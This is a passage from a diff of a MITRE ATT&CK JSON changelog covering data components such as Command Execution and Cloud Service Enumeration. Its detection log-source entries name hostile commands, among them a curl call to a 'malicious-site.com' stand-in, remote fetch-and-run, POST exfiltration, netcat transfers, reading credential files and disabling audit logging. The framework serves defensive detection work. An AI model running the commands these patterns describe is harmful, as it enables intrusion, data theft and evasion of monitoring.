+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app initiates or resumes network-capable execution while app_state=background or device_locked=true before opaque TLS session attempt"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app enters background-capable execution or resumes processing immediately before archive-like file creation or upload behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Persistent foreground-service notification is created, updated, or remains visible while app behavior or notification identity is inconsistent with declared function during the persistence interval"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Ingress transfer and local file creation occur while app_state=background or device_locked=true or recent_user_interaction=false during the acquisition phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Ingress retrieval and staging occur while app_state=background or device_locked=true or recent_user_interaction=false during the acquisition phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Native library load or JNI-backed execution occurs while app_state=background or device_locked=true or recent_user_interaction=false during the execution phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Modified or newly replaced application begins execution or persists while recent_user_interaction=false or device_locked=true or launch context is inconsistent with expected user-driven update flow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "System event occurs (e.g., SMS received, device boot completed, network state changed) acting as trigger event for execution phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application remains inactive across normal execution windows and transitions into background or foreground activity burst only when qualifying device context, lock state, locale, or network condition exists"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application remains dormant, low-activity, or background-resident across non-qualifying locations and transitions into active execution only after geographic condition is met"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application reduces or halts operational activity during periods of active user interaction and resumes background execution or periodic work only during low-motion or idle intervals"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "ecurity or monitoring application transitions to disabled, inactive, or non-reporting state while other applications remain active"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.773000+00:00\", \"old_value\": \"2026-04-15 20:49:00.264000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0083",
+                            "external_id": "DC0083"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Cloud Service Enumeration",
+                    "description": "Cloud service enumeration involves listing or querying available cloud services in a cloud control plane. This activity is often performed to identify resources such as virtual machines, storage buckets, compute clusters, or other services within a cloud environment. Examples include API calls like `AWS ECS ListServices`, `Azure ListAllResources`, or `Google Cloud ListInstances`. Examples: \n\nAWS Cloud Service Enumeration: The adversary gathers details about existing ECS services to identify opportunities for privilege escalation or exfiltration.\n- Azure Resource Enumeration: The adversary collects information about virtual machines, resource groups, and other Azure assets for reconnaissance purposes.\n- Google Cloud Resource Enumeration: The attacker seeks to map the environment and find misconfigured or underutilized resources for exploitation.\n- Office 365 Service Enumeration: The attacker may look for data repositories or collaboration tools to exfiltrate sensitive information.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "GetSecretValue"
+                        },
+                        {
+                            "name": "gcp:secrets",
+                            "channel": "accessSecretVersion"
+                        },
+                        {
+                            "name": "azure:ad",
+                            "channel": "SecretGet"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ssm:ListInventoryEntries"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "DescribeInstances, DescribeServices, ListFunctions: High frequency enumeration calls or unusual user agents performing discovery"
+                        },
+                        {
+                            "name": "azure:audit",
+                            "channel": "ListApplications, ListServicePrincipals: Large-scale queries against identity or application objects"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Get-MsolServicePrincipal, ListAppRoles: Service discovery operations executed by accounts not normally performing administrative tasks"
+                        },
+                        {
+                            "name": "saas:adminapi",
+                            "channel": "ListIntegrations, ListServices: Repeated service discovery requests from accounts without administrative responsibilities"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "GetInstanceIdentityDocument or IMDSv2 token requests"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "DescribeUsers / ListUsers / GetUser"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Graph API Query"
+                        },
+                        {
+                            "name": "saas:MDM",
+                            "channel": "Device lookup, location query, or remote management operation"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-02-23 19:38:20.657000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0083\", \"old_value\": \"https://attack.mitre.org/data-components/DC0083\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0064",
+                            "external_id": "DC0064"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Command Execution",
+                    "description": "Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples: \n\n- Windows Command Prompt\n    - dir \u2013 Lists directory contents.\n    - net user \u2013 Queries or manipulates user accounts.\n    - tasklist \u2013 Lists running processes.\n- PowerShell\n    - Get-Process \u2013 Retrieves processes running on a system.\n    - Set-ExecutionPolicy \u2013 Changes PowerShell script execution policies.\n    - Invoke-WebRequest \u2013 Downloads remote resources.\n- Linux Shell\n    - ls \u2013 Lists files in a directory.\n    - cat /etc/passwd \u2013 Reads the user accounts file.\n    - curl http://malicious-site.com \u2013 Retrieves content from a malicious URL.\n- Container Environments\n    - docker exec \u2013 Executes a command inside a running container.\n    - kubectl exec \u2013 Runs commands in Kubernetes pods.\n- macOS Terminal\n    - open \u2013 Opens files or URLs.\n    - dscl . -list /Users \u2013 Lists all users on the system.\n    - osascript -e \u2013 Executes AppleScript commands.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "android:logcat",
+                            "channel": "Command 'pm list packages' executed by app sandbox or child proc"
+                        },
+                        {
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "udev rule reload or trigger command executed"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve of script/interpreter (bash, python, node) with suspicious encoded or non-printable content"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Use of mv or cp to rename files with '.' prefix"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve: Execution of update-ca-certificates or trust anchor modification commands"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "gcore, gdb, strings, hexdump execution"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of auditctl, systemctl stop auditd, or kill -9 auditd"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execution of systemctl with subcommands start, stop, enable, disable"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of GUI-related binaries with suppressed window/display flags"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl -X POST, wget --post-data"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "command line arguments containing lsblk, fdisk, parted"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "exec: Execution of dd, efibootmgr, or flashrom modifying firmware/boot partitions"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl -d, wget --post-data"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "grep/cat/awk on files with password fields"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "git push, curl -X POST"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of gsettings set org.gnome.login-screen disable-user-list true"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execution of setfattr or getfattr commands"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Process execution of update-ca-certificates or openssl with suspicious arguments"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of chattr to set +i or +a attributes"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl or wget with POST/PUT options"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl -T, rclone copy"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve of curl,wget,bash,sh,python with piped or remote content"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve, kill, ptrace, insmod, rmmod targeting security processes"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "proctitle contains chmod, chown, setfacl, or attr commands with suspicious parameters"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "proctitle contains chmod, chown, chgrp, setfacl, or attr with suspicious parameters (777, 755, +x, -R)"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "process title records containing discovery command sequences and environmental assessment patterns"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "command-line execution patterns for system discovery utilities (uname, hostname, ifconfig, netstat, lsof, ps, mount)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of realmd, samba-tool, or ldapmodify with user-related arguments"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of script interpreters by systemd timer (ExecStart)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands like systemctl stop <service>, service <service> stop, or kill -9 <pid>"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls to locale, timedatectl, or cat /etc/timezone"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "sleep function usage or loops (nanosleep, usleep) in scripts"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect, execve, write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call including 'nohup' or trailing '&'"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands executed within an SSH session where no matching logon/authentication event exists"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod, execve"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: iptables, nft, firewall-cmd modifications"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Invocation of scp, rsync, curl, or sftp"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls modifying local mail filter configuration files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: process_name IN (\"virsh\", \"VBoxManage\", \"qemu-img\") AND command IN (\"list\", \"info\")"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: service stop syslog, systemctl stop rsyslog, kill -9 syslog"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: openssl pkcs12, certutil, keytool"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Process in container namespace executes curl|wget|bash|sh|python|nc with outbound args"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of systemctl or service with enable/start parameters"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of cat, less, grep, journalctl targeting log directories (/var/log/)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of python, perl, or custom binaries invoking compression libraries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, USER_CMD"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "bash/zsh of base64, tar, gzip, or openssl immediately after file write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Processes executing sendmail/postfix with forged headers"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of tar, gzip, bzip2, xz, zip, or openssl with compression/encryption arguments"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "promiscuous mode transitions (ioctl or ifconfig)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chattr, rm, shred, dd run on recovery directories or partitions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of curl or wget writing files to /tmp/* followed by chmod or execution"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of downgraded interpreters such as python2 or forced fallback commands"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Command line arguments including SPApplicationsDataType"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of spoofing tools (e.g., hping3, nping, scapy) sending UDP packets to known amplifier ports"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of tools like cat, grep, or awk on credential files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of curl, rsync, wget with internal knowledge base or IPs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of systemctl, loginctl, or systemd-inhibit commands related to sleep/hibernate"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of xev, xdotool, or input activity emulators"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of interpreters creating archive-like outputs without calling tar/gzip"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of insmod, modprobe, or rmmod commands by non-standard users or outside expected timeframes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve syscalls for discovery commands (uname, hostname, id, whoami, ps, netstat, mount) with command-line parameter analysis"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of curl, wget, or custom scripts accessing financial endpoints"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of tar, gzip, bzip2, or openssl with output redirection"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve=/sbin/shutdown or /sbin/reboot"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls modifying HISTFILE or HISTCONTROL via unset/export"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls to /usr/bin/locale or shell execution of $LANG"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of systemctl or service with enable/start/modify"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of lsmod, modinfo, or cat /proc/modules"
+                        },
+                        {
+                            "name": "auditd:USER_CMD",
+                            "channel": "USER_CMD"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "InvokeFunction"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "eventName: RunInstances, CreateUser, PutRolePolicy, InvokeCommand"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "SSM RunCommand"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "GetLogEvents: High frequency log exports from CloudWatch or equivalent services"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "command-line execution invoking credential enumeration"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ssm:GetCommandInvocation"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "SendCommand, StartSession, ExecuteCommand: Unexpected AWS Systems Manager command execution targeting EC2 instances"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "Intune PowerShell Scripts"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "OperationName=SetDomainAuthentication OR Update-MsolFederatedDomain"
+                        },
+                        {
+                            "name": "Command",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "docker:api",
+                            "channel": "docker logs access or container inspect commands from non-administrative users"
+                        },
+                        {
+                            "name": "docker:daemon",
+                            "channel": "docker exec or docker run with unexpected command/entrypoint"
+                        },
+                        {
+                            "name": "docker:events",
+                            "channel": "container exec rm|container stop --force"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "useradd or /etc/passwd modified inside container"
+                        },
+                        {
+                            "name": "EDR:AMSI",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "EDR:cli",
+                            "channel": "Command Line Telemetry"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "command execution"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "/var/log/hostd.log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "modification of config files or shell command execution"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "shell access or job registration"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "logline inspection"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "esxcli network firewall set commands"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "event stream"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "scp/ssh used to move file across hosts"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "esxcli system syslog config set or reload"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "command log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Execution of '/bin/vmx' or modifications to '/etc/rc.local.d/local.sh'"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Command Execution"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "remote CLI + vim-cmd logging"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "execution + payload hints"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli system syslog config set/reload, services.sh restart/stop"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "snapshot create/copy, esxcli"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "interactive shell"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "invoked remote scripts (esxcli)"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "base64 or gzip use within shell session"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "scripts or binaries with misleading names"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log entries containing \"esxcli system clock get\""
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "command IN (\"esxcli vm process list\", \"vim-cmd vmsvc/getallvms\")"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "openssl|tar|dd"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Execution of cat, tail, grep targeting /var/log/vmkernel.log or /var/log/hostd.log"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "CLI usage logs"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Command execution trace"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "shell command execution for chmod, chown, or file permission modification on VMFS or system files"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli system syslog config set --loghost='' or stopping hostd service"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Shell Access/Command Execution"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli software vib list"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/root/.ash_history"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "mv, rename, or chmod commands moving VM files into hidden directories"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "`esxcli software vib install` with `--force` or `--no-sig-check` from shell history or `shell.log`"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "CLI session activity"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli system shutdown or reboot invoked"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "shell command execution for system discovery (vim-cmd, esxcli, vmware-cmd) targeting VM inventory and host configuration"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "unset HISTFILE or HISTFILESIZE modifications"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "boot logs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "/var/log/vmkernel.log"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "DCUI shell start, BusyBox activity"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "esxcli system account add"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Unexpected restarts of management agents or shell access"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "esxcli, vim-cmd invocation"
+                        },
+                        {
+                            "name": "esxi:vobd",
+                            "channel": "shell session start"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "vCenter Management"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file system activity monitor"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "access to BPF devices or interface IOCTLs"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "methodName: setIamPolicy, startInstance, createServiceAccount"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "Shell process (e.g., /bin/sh, /bin/bash) spawned in a container without an interactive session attached (i.e., automation anomaly)"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "process execution involving curl, grep, or awk on secrets"
+                        },
+                        {
+                            "name": "linus:syslog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "command logging"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "Shell history logs"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "Terminal Command History"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "/home/*/.bash_history"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Command-line includes base64 -d or openssl enc -d"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process_events.command_line"
+                        },
+                        {
+                            "name": "linux:shell",
+                            "channel": "Manual invocation of software enumeration commands via interactive shell"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "cron activity"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Suspicious script or command execution targeting browser folders"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unusual outbound transfers from CLI tools like base64, gzip, or netcat"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo chage|grep pam_pwquality|cat /etc/login.defs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo execution of ffmpeg/gst-launch/v4l2-ctl by non-standard user"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sshd logs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "CLI access to 'show running-config', 'show password', or 'cat config.txt'"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Sudo or root escalation followed by filesystem mount commands"
+                        },
+                        {
+                            "name": "linuxsyslog",
+                            "channel": "nslcd or winbind logs"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "Activity Log: Command Invocation"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Cmdlet: Get-GlobalAddressList, Get-Recipient"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Get-RoleGroup, Get-DistributionGroup"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "Inbound email triggers execution of mailbox-stored custom form"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "Inbound email matches crafted rule trigger pattern tied to persistence logic"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "Inbound email triggering Outlook to auto-access folder tied to malicious Home Page"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "Startup execution includes non-default component"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "Execution of unsigned macro from template"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Automated forwarding or file sync initiated by a logic app"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Search-Mailbox, Get-MessageTrace, eDiscovery requests"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-Mailbox, New-InboxRule"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-Mailbox, Set-MailboxPolicy, Set-TrustedLocation"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Interpreter exec with suspicious arguments as above"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd + process_events"
+                        },
+                        {
+                            "name": "macos:syslog",
+                            "channel": "system.log"
+                        },
+                        {
+                            "name": "macos:syslog",
+                            "channel": "/var/log/system.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dsconfigad or dscl with create or append options for AD-bound users"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl unload, kill, or pkill commands affecting daemons or background services"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of security-agent detection or enumeration commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of chflags hidden or SetFile -a V"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "defaults read -g AppleLocale, systemsetup -gettimezone"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "profiles install -type=configuration"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'eventMessage contains \"loginwindow\" or \"pfctl\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec or sudo usage with NOPASSWD context or echo modifying sudoers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of /usr/bin/security add-trusted-cert or keychain modifications to System.keychain"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "nohup, disown, or osascript execution patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of 'profiles install -type=configuration'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem:com.apple.Terminal"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "base64 or curl processes chained within short execution window"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Invocation of /usr/bin/defaults write or /usr/bin/plutil modifying plist keys"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "chmod command with arguments including '+s', 'u+s', or numeric values 4000\u20136777"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "command includes dscl . delete or sysadminctl --deleteUser"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DS daemon log entries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "diskutil eraseDisk / asr restore with destructive flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "pfctl -d, socketfilterfw --setglobalstate off, or modifications to com.apple.alf"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "pwpolicy|PasswordPolicy"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Command line contains smbutil view //, mount_smbfs //"
+                        },
+                        {
